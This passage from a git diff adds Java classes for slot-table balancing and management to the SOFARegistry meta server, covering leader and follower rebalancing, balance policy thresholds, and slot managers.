dataServers2Leaders.get(selectedDataServer); + return Tuple.of(selectedDataServer, leaders.get(0)); + } + + private List findDataServersLeaderHighWaterMark(int threshold) { + List dataNodeSlots = slotTableBuilder.getDataNodeSlotsLeaderBeyond(threshold); + List dataServers = DataNodeSlot.collectDataNodes(dataNodeSlots); + dataServers.sort(Comparators.mostLeadersFirst(slotTableBuilder)); + LOGGER.info( + "[LeaderHighWaterMark] threshold={}, dataServers={}/{}", + threshold, + dataServers.size(), + dataServers); + return dataServers; + } + + private List findDataServersLeaderLowWaterMark(int threshold) { + List dataNodeSlots = slotTableBuilder.getDataNodeSlotsLeaderBelow(threshold); + List dataServers = DataNodeSlot.collectDataNodes(dataNodeSlots); + dataServers.sort(Comparators.leastLeadersFirst(slotTableBuilder)); + LOGGER.info( + "[LeaderLowWaterMark] threshold={}, dataServers={}/{}", + threshold, + dataServers.size(), + dataServers); + return dataServers; + } + + private List findDataServersFollowerHighWaterMark(int threshold) { + List dataNodeSlots = slotTableBuilder.getDataNodeSlotsFollowerBeyond(threshold); + List dataServers = DataNodeSlot.collectDataNodes(dataNodeSlots); + dataServers.sort(Comparators.mostFollowersFirst(slotTableBuilder)); + LOGGER.info( + "[FollowerHighWaterMark] threshold={}, dataServers={}/{}", + threshold, + dataServers.size(), + dataServers); + return dataServers; + } + + private List findDataServersFollowerLowWaterMark(int threshold) { + List dataNodeSlots = slotTableBuilder.getDataNodeSlotsFollowerBelow(threshold); + List dataServers = DataNodeSlot.collectDataNodes(dataNodeSlots); + dataServers.sort(Comparators.leastFollowersFirst(slotTableBuilder)); + LOGGER.info( + "[FollowerLowWaterMark] threshold={}, dataServers={}/{}", + threshold, + dataServers.size(), + dataServers); + return dataServers; + } + + private boolean balanceHighFollowerSlots() { + final int followerCeilAvg = + MathUtils.divideCeil(slotNum * (slotReplicas - 1), currentDataServers.size()); + final int maxMove = balancePolicy.getMaxMoveFollowerSlots(); + final int threshold = balancePolicy.getHighWaterMarkSlotFollowerNums(followerCeilAvg); + int balanced = 0, prevBalanced = -1; + while (balanced < maxMove) { + final List highDataServers = findDataServersFollowerHighWaterMark(threshold); + if (highDataServers.isEmpty()) { + break; + } + + Set excludes = Sets.newHashSet(highDataServers); + excludes.addAll(findDataServersFollowerHighWaterMark(threshold - 1)); + + prevBalanced = balanced; + for (String highDataServer : highDataServers) { + Tuple selected = selectFollower4BalanceOut(highDataServer, excludes); + if (selected == null) { + LOGGER.warn( + "[balanceHighFollowerSlots] could not find follower slot to balance: {}", + highDataServer); + continue; + } + final int followerSlot = selected.o2; + final String newFollowerDataServer = selected.o1; + slotTableBuilder.removeFollower(followerSlot, highDataServer); + slotTableBuilder.addFollower(followerSlot, newFollowerDataServer); + LOGGER.info( + "[balanceHighFollowerSlots] balance follower slotId={} from {} to {}", + followerSlot, + highDataServer, + newFollowerDataServer); + Metrics.SlotBalance.onHighFollowerMigrate( + highDataServer, newFollowerDataServer, followerSlot); + balanced++; + break; + } + /** + * avoid for infinity loop once the "prev-balanced == balanced", it means that we can't find + * any suitable candidate for migrate stop before we case an infinity loop + */ + if (prevBalanced == balanced) { + LOGGER.warn("[balanceHighFollowerSlots][prevBlanced == balanced]no more balance available"); + break; + } + } + return balanced != 0; + } + + private boolean balanceLowFollowerSlots() { + final int followerFloorAvg = + Math.floorDiv(slotNum * (slotReplicas - 1), currentDataServers.size()); + final int maxMove = balancePolicy.getMaxMoveFollowerSlots(); + final int threshold = balancePolicy.getLowWaterMarkSlotFollowerNums(followerFloorAvg); + int balanced = 0, prevBalanced = -1; + while (balanced < maxMove) { + final List lowDataServers = findDataServersFollowerLowWaterMark(threshold); + if (lowDataServers.isEmpty()) { + break; + } + + Set excludes = Sets.newHashSet(lowDataServers); + excludes.addAll(findDataServersFollowerLowWaterMark(threshold + 1)); + + prevBalanced = balanced; + for (String lowDataServer : lowDataServers) { + Tuple selected = selectFollower4BalanceIn(lowDataServer, excludes); + if (selected == null) { + LOGGER.warn( + "[balanceLowFollowerSlots] could not find follower slot to balance: {}", + lowDataServer); + continue; + } + final int followerSlot = selected.o2; + final String oldFollowerDataServer = selected.o1; + slotTableBuilder.removeFollower(followerSlot, oldFollowerDataServer); + slotTableBuilder.addFollower(followerSlot, lowDataServer); + LOGGER.info( + "[balanceLowFollowerSlots] balance follower slotId={} from {} to {}", + followerSlot, + oldFollowerDataServer, + lowDataServer); + Metrics.SlotBalance.onLowFollowerMigrate( + oldFollowerDataServer, lowDataServer, followerSlot); + balanced++; + break; + } + if (prevBalanced == balanced) { + LOGGER.warn("[balanceLowFollowerSlots][prevBlanced == balanced]no more balance available"); + break; + } + } + return balanced != 0; + } + + private Tuple selectFollower4BalanceIn( + String followerDataServer, Set excludes) { + final DataNodeSlot dataNodeSlot = slotTableBuilder.getDataNodeSlot(followerDataServer); + List candidates = + getCandidateDataServers( + excludes, Comparators.mostFollowersFirst(slotTableBuilder), currentDataServers); + LOGGER.info( + "[selectFollower4BalanceIn] target={}, followerSize={}, candidates={}", + followerDataServer, + dataNodeSlot.getFollowers().size(), + candidates); + for (String candidate : candidates) { + DataNodeSlot candidateDataNodeSlot = slotTableBuilder.getDataNodeSlot(candidate); + Set candidateFollowerSlots = candidateDataNodeSlot.getFollowers(); + for (int candidateFollowerSlot : candidateFollowerSlots) { + if (dataNodeSlot.containsFollower(candidateFollowerSlot)) { + LOGGER.info( + "[selectFollower4BalanceIn] skip, target {} contains follower {}, candidate={}", + followerDataServer, + candidateFollowerSlot, + candidate); + continue; + } + if (dataNodeSlot.containsLeader(candidateFollowerSlot)) { + LOGGER.info( + "[selectFollower4BalanceIn] skip, target {} contains leader {}, candidate={}", + followerDataServer, + candidateFollowerSlot, + candidate); + continue; + } + return Tuple.of(candidate, candidateFollowerSlot); + } + } + return null; + } + + private Tuple selectFollower4BalanceOut( + String followerDataServer, Set excludes) { + final DataNodeSlot dataNodeSlot = slotTableBuilder.getDataNodeSlot(followerDataServer); + Set followerSlots = dataNodeSlot.getFollowers(); + List candidates = + getCandidateDataServers( + excludes, Comparators.leastFollowersFirst(slotTableBuilder), currentDataServers); + LOGGER.info( + "[selectFollower4BalanceOut] target={}, followerSize={}, candidates={}", + followerDataServer, + followerSlots.size(), + candidates); + for (Integer followerSlot : followerSlots) { + for (String candidate : candidates) { + DataNodeSlot candidateDataNodeSlot = slotTableBuilder.getDataNodeSlot(candidate); + if (candidateDataNodeSlot.containsLeader(followerSlot)) { + LOGGER.info( + "[selectFollower4BalanceOut] skip, conflict leader, target={}, follower={}, candidate={}", + followerDataServer, + followerSlot, + candidate); + continue; + } + if (candidateDataNodeSlot.containsFollower(followerSlot)) { + LOGGER.info( + "[selectFollower4BalanceOut] skip, conflict follower, target={}, follower={}, candidate={}", + followerDataServer, + followerSlot, + candidate); + continue; + } + return Tuple.of(candidate, followerSlot); + } + } + return null; + } + + public SlotTableBuilder getSlotTableBuilder() { + return slotTableBuilder; + } + + private List getCandidateDataServers( + Collection excludes, + Comparator comp, + Collection candidateDataServers) { + Set candidates = Sets.newHashSet(candidateDataServers); + candidates.removeAll(excludes); + List ret = Lists.newArrayList(candidates); + if (comp != null) { + ret.sort(comp); + } + return ret; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/balance/LeaderOnlyBalancer.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/balance/LeaderOnlyBalancer.java new file mode 100644 index 000000000..eafe3633c --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/balance/LeaderOnlyBalancer.java @@ -0,0 +1,144 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.balance; + +import com.alipay.sofa.registry.common.model.Tuple; +import com.alipay.sofa.registry.common.model.slot.DataNodeSlot; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.meta.slot.SlotBalancer; +import com.alipay.sofa.registry.server.meta.slot.util.builder.SlotTableBuilder; +import com.alipay.sofa.registry.server.meta.slot.util.comparator.Comparators; +import com.alipay.sofa.registry.server.shared.slot.SlotTableUtils; +import com.alipay.sofa.registry.util.MathUtils; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Lists; +import com.google.common.collect.Sets; +import java.util.*; + +/** + * @author chen.zhu + *

Jan 21, 2021 + */ +public class LeaderOnlyBalancer implements SlotBalancer { + + private static final Logger logger = LoggerFactory.getLogger(LeaderOnlyBalancer.class); + + public static final int TRIGGER_THESHOLD = 2; + + private final SlotTableBuilder slotTableBuilder; + + private final Set currentDataServers; + + private final NaiveBalancePolicy balancePolicy = new NaiveBalancePolicy(); + + public LeaderOnlyBalancer( + SlotTableBuilder slotTableBuilder, Collection currentDataServers) { + this.slotTableBuilder = slotTableBuilder; + this.currentDataServers = Collections.unmodifiableSet(Sets.newTreeSet(currentDataServers)); + } + + @Override + public SlotTable balance() { + final int leaderCeilAvg = + MathUtils.divideCeil(slotTableBuilder.getSlotNums(), currentDataServers.size()); + final int maxMove = balancePolicy.getMaxMoveLeaderSlots(); + int balanced = 0; + while (balanced < maxMove) { + List targetHighDataServers = findDataServersLeaderHighWaterMark(leaderCeilAvg); + if (targetHighDataServers.isEmpty()) { + logger.info("[balance]no data-servers needs leader balance"); + // no balance, return null + break; + } + final Set excludes = Sets.newHashSet(targetHighDataServers); + // exclude the dataNode which could not add any leader + excludes.addAll(findDataServersLeaderHighWaterMark(leaderCeilAvg - 1)); + + for (String target : targetHighDataServers) { + Tuple candidate = selectLeader(target, excludes); + if (candidate == null) { + continue; + } + final String newLeader = candidate.o1; + final int slotId = candidate.o2; + slotTableBuilder.replaceLeader(slotId, newLeader); + balanced++; + break; + } + } + if (balanced != 0) { + SlotTable slotTable = slotTableBuilder.build(); + logger.info( + "[balance][end] slot table leader stat: {}", + SlotTableUtils.getSlotTableLeaderCount(slotTable)); + logger.info( + "[balance][end] slot table slots stat: {}", + SlotTableUtils.getSlotTableSlotCount(slotTable)); + return slotTable; + } + return null; + } + + private Tuple selectLeader(String leaderDataServer, Set excludes) { + final DataNodeSlot dataNodeSlot = slotTableBuilder.getDataNodeSlot(leaderDataServer); + List candidates = + getCandidateDataServers( + excludes, Comparators.leastLeadersFirst(slotTableBuilder), currentDataServers); + logger.info( + "[selectLeader] target={}, leaders={}, candidates={}", + leaderDataServer, + dataNodeSlot.getLeaders().size(), + candidates); + for (int leader : dataNodeSlot.getLeaders()) { + for (String candidate : candidates) { + return Tuple.of(candidate, leader); + } + } + return null; + } + + private List findDataServersLeaderHighWaterMark(int avg) { + int threshold = balancePolicy.getHighWaterMarkSlotLeaderNums(avg); + List dataNodeSlots = slotTableBuilder.getDataNodeSlotsLeaderBeyond(threshold); + List dataServers = DataNodeSlot.collectDataNodes(dataNodeSlots); + dataServers.sort(Comparators.mostLeadersFirst(slotTableBuilder)); + logger.info( + "[LeaderHighWaterMark] avg={}, threshold={}, dataServers={}", avg, threshold, dataServers); + return dataServers; + } + + private List getCandidateDataServers( + Collection excludes, + Comparator comp, + Collection candidateDataServers) { + Set candidates = Sets.newHashSet(candidateDataServers); + candidates.removeAll(excludes); + List ret = Lists.newArrayList(candidates); + if (comp != null) { + ret.sort(comp); + } + return ret; + } + + @VisibleForTesting + public LeaderOnlyBalancer setMaxMoveLeaderSlots(int max) { + this.balancePolicy.setMaxMoveLeaderSlots(max); + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/balance/NaiveBalancePolicy.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/balance/NaiveBalancePolicy.java new file mode 100644 index 000000000..12967c458 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/balance/NaiveBalancePolicy.java @@ -0,0 +1,84 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.balance; + +import com.alipay.sofa.registry.util.MathUtils; + +/** + * @author chen.zhu + *

Jan 20, 2021 + */ +public class NaiveBalancePolicy implements BalancePolicy { + + public static final String PROP_LEADER_MAX_MOVE = "registry.slot.leader.max.move"; + public static final String PROP_FOLLOWER_MAX_MOVE = "registry.slot.follower.max.move"; + public static final String PROP_BALANCE_THRESHOLD = "registry.slot.balance.threshold"; + + public static final int DEF_LEADER_MAX_MOVE = 4; + + private int balanceThreshold = Integer.getInteger(PROP_BALANCE_THRESHOLD, 10); + + private int maxMoveLeaderSlots = Integer.getInteger(PROP_LEADER_MAX_MOVE, DEF_LEADER_MAX_MOVE); + + private int maxMoveFollowerSlots = Integer.getInteger(PROP_FOLLOWER_MAX_MOVE, 16); + + @Override + public int getLowWaterMarkSlotLeaderNums(int average) { + // round down + return average * (100 - balanceThreshold) / 100; + } + + @Override + public int getHighWaterMarkSlotLeaderNums(int average) { + // round up + return MathUtils.divideCeil(average * (100 + balanceThreshold), 100); + } + + @Override + public int getLowWaterMarkSlotFollowerNums(int average) { + // same as getLowWaterMarkSlotLeaderNums + return getLowWaterMarkSlotLeaderNums(average); + } + + @Override + public int getHighWaterMarkSlotFollowerNums(int average) { + // same as getHighWaterMarkSlotLeaderNums + return getHighWaterMarkSlotLeaderNums(average); + } + + @Override + public int getMaxMoveLeaderSlots() { + return maxMoveLeaderSlots; + } + + @Override + public int getMaxMoveFollowerSlots() { + return maxMoveFollowerSlots; + } + + public void setBalanceThreshold(int balanceThreshold) { + this.balanceThreshold = balanceThreshold; + } + + public void setMaxMoveLeaderSlots(int maxMoveLeaderSlots) { + this.maxMoveLeaderSlots = maxMoveLeaderSlots; + } + + public void setMaxMoveFollowerSlots(int maxMoveFollowerSlots) { + this.maxMoveFollowerSlots = maxMoveFollowerSlots; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/manager/DefaultSlotManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/manager/DefaultSlotManager.java new file mode 100644 index 000000000..b9c434949 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/manager/DefaultSlotManager.java @@ -0,0 +1,103 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.manager; + +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.exception.InitializeException; +import com.alipay.sofa.registry.lifecycle.impl.LifecycleHelper; +import com.alipay.sofa.registry.observer.Observable; +import com.alipay.sofa.registry.observer.UnblockingObserver; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.remoting.notifier.Notifier; +import com.alipay.sofa.registry.server.meta.slot.SlotManager; +import com.google.common.annotations.VisibleForTesting; +import java.util.List; +import javax.annotation.PostConstruct; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Component; + +/** + * @author chen.zhu + *

Dec 02, 2020 + */ +@Component +public class DefaultSlotManager extends SimpleSlotManager implements SlotManager { + + @Autowired(required = false) + private List notifiers; + + @Autowired private MetaLeaderService metaLeaderService; + + public DefaultSlotManager() {} + + public DefaultSlotManager(MetaLeaderService metaLeaderService) { + this.metaLeaderService = metaLeaderService; + } + + @PostConstruct + public void postConstruct() throws Exception { + LifecycleHelper.initializeIfPossible(this); + } + + @Override + protected void doInitialize() throws InitializeException { + super.doInitialize(); + addObserver(new SlotTableChangeNotification()); + } + + @Override + public boolean refresh(SlotTable slotTable) { + // if we are not leader, could not refresh table + // this maybe happens in fgc: + // before arrange we are leader, but calc takes too much time + if (!metaLeaderService.amILeader()) { + throw new IllegalStateException( + "not leader, concurrent leader is:" + metaLeaderService.getLeader()); + } + if (super.refresh(slotTable)) { + notifyObservers(slotTable); + return true; + } + return false; + } + + private final class SlotTableChangeNotification implements UnblockingObserver { + + @Override + public void update(Observable source, Object message) { + if (message instanceof SlotTable) { + if (notifiers == null || notifiers.isEmpty()) { + return; + } + notifiers.forEach( + notifier -> { + try { + notifier.notifySlotTableChange((SlotTable) message); + } catch (Throwable th) { + logger.error("[notify] notifier [{}]", notifier.getClass().getSimpleName(), th); + } + }); + } + } + } + + @VisibleForTesting + public SimpleSlotManager setNotifiers(List notifiers) { + this.notifiers = notifiers; + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/manager/SimpleSlotManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/manager/SimpleSlotManager.java new file mode 100644 index 000000000..c71241657 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/manager/SimpleSlotManager.java @@ -0,0 +1,136 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.manager; + +import com.alipay.sofa.registry.common.model.slot.DataNodeSlot; +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.observer.impl.AbstractLifecycleObservable; +import com.alipay.sofa.registry.server.meta.slot.SlotManager; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.ImmutableMap; +import com.google.common.collect.Maps; +import java.util.List; +import java.util.Map; +import java.util.concurrent.locks.ReadWriteLock; +import java.util.concurrent.locks.ReentrantReadWriteLock; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public class SimpleSlotManager extends AbstractLifecycleObservable implements SlotManager { + + private final ReadWriteLock lock = new ReentrantReadWriteLock(); + + private volatile SlotTableCacheWrapper localRepo = + new SlotTableCacheWrapper(SlotTable.INIT, ImmutableMap.of()); + + private int slotNums = SlotConfig.SLOT_NUM; + private int slotReplicas = SlotConfig.SLOT_REPLICAS; + + @Override + public SlotTable getSlotTable() { + lock.readLock().lock(); + try { + return localRepo.slotTable; + } finally { + lock.readLock().unlock(); + } + } + + @Override + public boolean refresh(SlotTable slotTable) { + lock.writeLock().lock(); + try { + if (slotTable.getEpoch() <= localRepo.slotTable.getEpoch()) { + if (logger.isWarnEnabled()) { + logger.warn( + "[refresh]receive slot table,but epoch({}) is smaller than current({})", + slotTable.getEpoch(), + localRepo.slotTable.getEpoch()); + } + return false; + } + setSlotTableCacheWrapper(new SlotTableCacheWrapper(slotTable, refreshReverseMap(slotTable))); + } finally { + lock.writeLock().unlock(); + } + return true; + } + + private Map refreshReverseMap(SlotTable slotTable) { + Map newMap = Maps.newHashMap(); + List dataNodeSlots = slotTable.transfer(null, false); + for (DataNodeSlot dataNodeSlot : dataNodeSlots) { + newMap.put(dataNodeSlot.getDataNode(), dataNodeSlot); + } + return ImmutableMap.copyOf(newMap); + } + + @Override + public int getSlotNums() { + return slotNums; + } + + @Override + public int getSlotReplicaNums() { + return slotReplicas; + } + + @VisibleForTesting + public void setSlotNums(int slotNums) { + this.slotNums = slotNums; + } + + @VisibleForTesting + public void setSlotReplicas(int slotReplicas) { + this.slotReplicas = slotReplicas; + } + + @Override + public DataNodeSlot getDataNodeManagedSlot(String dataNode, boolean ignoreFollowers) { + lock.readLock().lock(); + try { + // here we ignore port for data-node, as when store the reverse-map, we lose the port + // information + // besides, port is not matter here + DataNodeSlot target = localRepo.reverseMap.get(dataNode); + if (target == null) { + return new DataNodeSlot(dataNode); + } + return target.fork(ignoreFollowers); + } finally { + lock.readLock().unlock(); + } + } + + private void setSlotTableCacheWrapper(SlotTableCacheWrapper wrapper) { + this.localRepo = wrapper; + } + + private static final class SlotTableCacheWrapper { + private final SlotTable slotTable; + + private final Map reverseMap; + + public SlotTableCacheWrapper(SlotTable slotTable, Map reverseMap) { + this.slotTable = slotTable; + this.reverseMap = reverseMap; + } + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/tasks/BalanceTask.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/tasks/BalanceTask.java new file mode 100644 index 000000000..b9e2c0631 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/tasks/BalanceTask.java @@ -0,0 +1,108 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.tasks; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.meta.slot.RebalanceTask; +import com.alipay.sofa.registry.server.meta.slot.SlotManager; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import java.util.List; +import java.util.Map; +import java.util.concurrent.atomic.AtomicInteger; +import org.apache.commons.collections.CollectionUtils; + +/** + * @author chen.zhu + *

Dec 01, 2020 + */ +public class BalanceTask implements RebalanceTask { + + private static final Logger logger = LoggerFactory.getLogger(BalanceTask.class); + + private final SlotManager slotManager; + + private final AtomicInteger nextLeaderIndex = new AtomicInteger(); + + private final AtomicInteger nextFollowerIndex = new AtomicInteger(1); + + private final List dataNodes; + + public BalanceTask(SlotManager slotManager, List dataNodes) { + this.slotManager = slotManager; + this.dataNodes = Lists.newArrayList(dataNodes); + } + + @Override + public void run() { + if (CollectionUtils.isEmpty(dataNodes)) { + logger.info("[run] empty candidate, quit"); + return; + } + if (logger.isInfoEnabled()) { + logger.info("[run] candidates({}): {}", dataNodes.size(), dataNodes); + } + initParameters(); + SlotTable slotTable = createSlotTable(); + if (logger.isInfoEnabled()) { + logger.info("[run] end to init slot table"); + } + + slotManager.refresh(slotTable); + if (logger.isInfoEnabled()) { + logger.info("[run] raft refreshed slot-table"); + } + } + + private void initParameters() { + nextLeaderIndex.set(0); + nextFollowerIndex.set(dataNodes.size() - 1); + } + + private SlotTable createSlotTable() { + Map slotMap = generateSlotMap(); + return new SlotTable(DatumVersionUtil.nextId(), slotMap.values()); + } + + private Map generateSlotMap() { + Map slotMap = Maps.newHashMap(); + for (int i = 0; i < slotManager.getSlotNums(); i++) { + long epoch = DatumVersionUtil.nextId(); + String leader = getNextLeader().getIp(); + List followers = Lists.newArrayList(); + for (int j = 0; j < slotManager.getSlotReplicaNums() - 1; j++) { + followers.add(getNextFollower().getIp()); + } + Slot slot = new Slot(i, leader, epoch, followers); + slotMap.put(i, slot); + } + return slotMap; + } + + private DataNode getNextLeader() { + return dataNodes.get(nextLeaderIndex.getAndIncrement() % dataNodes.size()); + } + + private DataNode getNextFollower() { + return dataNodes.get(nextFollowerIndex.getAndIncrement() % dataNodes.size()); + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/MigrateSlotGroup.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/MigrateSlotGroup.java new file mode 100644 index 000000000..45d00d5bc --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/MigrateSlotGroup.java @@ -0,0 +1,161 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.util; + +import com.alipay.sofa.registry.server.meta.slot.assigner.ScoreStrategy; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import java.util.*; +import org.glassfish.jersey.internal.guava.Sets; + +/** + * @author chen.zhu + *

Jan 12, 2021 + *

MigrateSlotGroup is used as a model object to cache all slots we wish to migrate Separated + * through different roles(Leader/Follower) + */ +public class MigrateSlotGroup { + + /** slotId */ + private final Set leaders = Sets.newHashSet(); + /** key: slotId, value: counter (one slot could has multi followers to migrate) */ + private final Map lackFollowers = Maps.newHashMap(); + + /** + * Add leader migrate slot group. + * + * @param slotId the slot id + * @return the migrate slot group + */ + public MigrateSlotGroup addLeader(int slotId) { + leaders.add(slotId); + return this; + } + + public boolean isEmpty() { + return leaders.isEmpty() && lackFollowers.isEmpty(); + } + + /** + * Add follower migrate slot group. + * + * @param slotId the slot id + * @return the migrate slot group + */ + public MigrateSlotGroup addFollower(int slotId) { + lackFollowers.put(slotId, lackFollowers.getOrDefault(slotId, 0) + 1); + return this; + } + + public MigrateSlotGroup addFollower(int slotId, int num) { + lackFollowers.put(slotId, lackFollowers.getOrDefault(slotId, 0) + num); + return this; + } + + public List getLeadersByScore(ScoreStrategy scoreStrategy) { + List leaders = Lists.newArrayList(this.leaders); + leaders.sort( + new Comparator() { + @Override + public int compare(Integer slotId1, Integer slotId2) { + return scoreStrategy.score(slotId1) - scoreStrategy.score(slotId2); + } + }); + return leaders; + } + + public List getFollowersByScore(ScoreStrategy scoreStrategy) { + List assignees = Lists.newArrayList(); + lackFollowers.forEach((slotId, nums) -> assignees.add(new FollowerToAssign(slotId, nums))); + assignees.sort( + new Comparator() { + @Override + public int compare(FollowerToAssign o1, FollowerToAssign o2) { + return scoreStrategy.score(o1) - scoreStrategy.score(o2); + } + }); + return assignees; + } + + /** + * Gets get leaders. + * + * @return the get leaders + */ + public Set getLeaders() { + return Collections.unmodifiableSet(leaders); + } + + /** + * Gets get followers. + * + * @return the get followers + */ + public Map getLackFollowers() { + return Collections.unmodifiableMap(lackFollowers); + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (o == null || getClass() != o.getClass()) return false; + MigrateSlotGroup that = (MigrateSlotGroup) o; + return Objects.equals(leaders, that.leaders) + && Objects.equals(lackFollowers, that.lackFollowers); + } + + @Override + public int hashCode() { + return Objects.hash(leaders, lackFollowers); + } + + @Override + public String toString() { + return "MigrateSlotGroup{" + "leaders=" + leaders + ", lackFollowers=" + lackFollowers + '}'; + } + + public static class FollowerToAssign { + private final int slotId; + private final int assigneeNums; + + public FollowerToAssign(int slotId, int assigneeNums) { + this.slotId = slotId; + this.assigneeNums = assigneeNums; + } + + public int getSlotId() { + return slotId; + } + + public int getAssigneeNums() { + return assigneeNums; + } + + @Override + public boolean equals(Object o) { + if (this == o) return true; + if (o == null || getClass() != o.getClass()) return false; + FollowerToAssign that = (FollowerToAssign) o; + return slotId == that.slotId && assigneeNums == that.assigneeNums; + } + + @Override + public int hashCode() { + return Objects.hash(slotId, assigneeNums); + } + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/builder/Builder.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/builder/Builder.java new file mode 100644 index 000000000..11339b7ed --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/slot/util/builder/Builder.java @@ -0,0 +1,25 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this 